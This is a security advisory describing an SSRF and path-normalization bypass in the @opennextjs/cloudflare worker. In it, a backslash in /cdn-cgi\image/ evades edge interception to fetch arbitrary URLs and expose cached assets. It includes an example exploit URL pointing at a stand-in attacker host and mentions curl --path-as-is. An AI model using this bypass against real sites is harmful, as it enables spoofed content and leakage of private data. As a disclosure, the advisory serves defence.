SSRF vulnerability in opennextjs-cloudflare via /cdn-cgi/ path normalization bypass
A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler.The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs.
For example:
https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com
In this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services.
Note: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests.
Additionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.
Problem Types
| Type | CWE ID | Description |
|---|
| CWE | CWE-918 | CWE-918 Server-Side Request Forgery (SSRF) |
| CWE | CWE-706 | CWE-706 Use of Incorrectly-Resolved Name or Reference |
Type: CWE
Description: CWE-918 Server-Side Request Forgery (SSRF)
Type: CWE
Description: CWE-706 Use of Incorrectly-Resolved Name or Reference
Metrics
| Version | Base score | Base severity | Vector |
|---|
| 4.0 | 7.7 | HIGH | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N |
Version: 4.0
Base score: 7.7
Base severity: HIGH
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N
Impacts
| CAPEC ID | Description |
|---|
| CAPEC-664 | CAPEC-664 Server Side Request Forgery |
| CAPEC-267 | CAPEC-267 Leverage Alternate Encoding |
Description: CAPEC-664 Server Side Request Forgery
Description: CAPEC-267 Leverage Alternate Encoding